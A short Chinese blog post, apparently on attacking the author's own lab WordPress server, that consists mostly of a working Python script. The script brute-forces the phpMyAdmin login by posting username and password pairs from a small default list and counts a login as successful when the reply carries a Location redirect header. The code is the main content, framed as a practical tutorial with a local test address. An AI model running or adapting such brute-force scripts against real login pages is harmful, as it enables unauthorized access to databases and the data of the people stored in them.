上次搭建的wordpress网站,新增加了phpMyAdmin,使用python暴力破解phpMyAdmin
代码为
#coding=utf-8
import requests
import re
#url='http://192.168.72.131/phpMyAdmin/index.php'
url=raw_input(unicode("请输入url地址:","utf-8").encode("gbk"))
def phpmyadmin_brute(url,username,password):
headers={
'Content-Type':'application/x-www-form-urlencoded'
}
post={
'pma_username':username,
'pma_password':password,
'server':'1',
'token':'5b63cad7b0e116159262cb0a93ee3508'
}
html=requests.post(url=url, data=post, headers=headers,allow_redirects=False).headers
if 'Location' in html.keys():
print u'破解成功-----用户名%s,密码%s' % (username,password)
return html['location']
else:
return u'用户名%s,密码%s-----错误' % (username,password)
users=['admin','root','123456']
passes=['root','admin','123456']
for password in passes:
for username in users:
print phpmyadmin_brute(url,username,password)
注意:这次暴力破解为Linux,而且判断是否爆破成功的依据是响应头里是否还有Location,而在windows上不能作为判断的依据。
phpmyadmin.py
success
网友评论